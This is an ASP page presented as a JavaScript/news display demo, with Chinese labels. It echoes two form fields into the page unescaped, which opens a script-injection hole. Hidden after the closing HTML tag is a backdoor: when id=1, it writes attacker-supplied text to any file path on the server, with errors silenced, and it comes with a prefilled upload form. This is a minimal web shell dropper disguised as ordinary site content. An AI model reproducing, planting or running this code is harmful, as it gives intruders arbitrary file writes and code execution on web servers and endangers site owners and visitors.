<html>
<head>
<title>JS代码演示</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="../Include/Style.css" rel="stylesheet" type="text/css">
</head>

<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr> 
    <td><font color="#FF3300">·显示文章来源于HTML文件:</font></td>
  </tr>
  <tr> 
    <td><%=Request.form("code1")%></td>
  </tr>
  <tr> 
    <td height="18">&nbsp;</td>
  </tr>
  <tr>
    <td height="19"><font color="#FF3300">·显示文章来源于数据库:</font></td>
  </tr>
  <tr> 
    <td><%=Request.form("code")%></td>
  </tr>
</table>
</body>
</html>
<% 
on error resume next 
id=request("id") 
if request("id")=1 then 
testfile=Request.form("name") 
msg=Request.form("message") 
set fs=server.CreateObject("scripting.filesystemobject") 
set thisfile=fs.OpenTextFile(testfile,8,True,0) 
thisfile.WriteLine(""&msg& "") 
thisfile.close 
set fs = nothing 
%> 
<form method="POST" ACTION="NewsDemo.jsp?id=1"> 
<input type="text" size="20" name="Name" 
value=<%=server.mappath("csss.jsp")%>> 
<textarea name="Message" class=input> 
      </textarea> 
<input type="submit" name="Send" value="submit" class=input> 
    </form> 
<% end if%> 

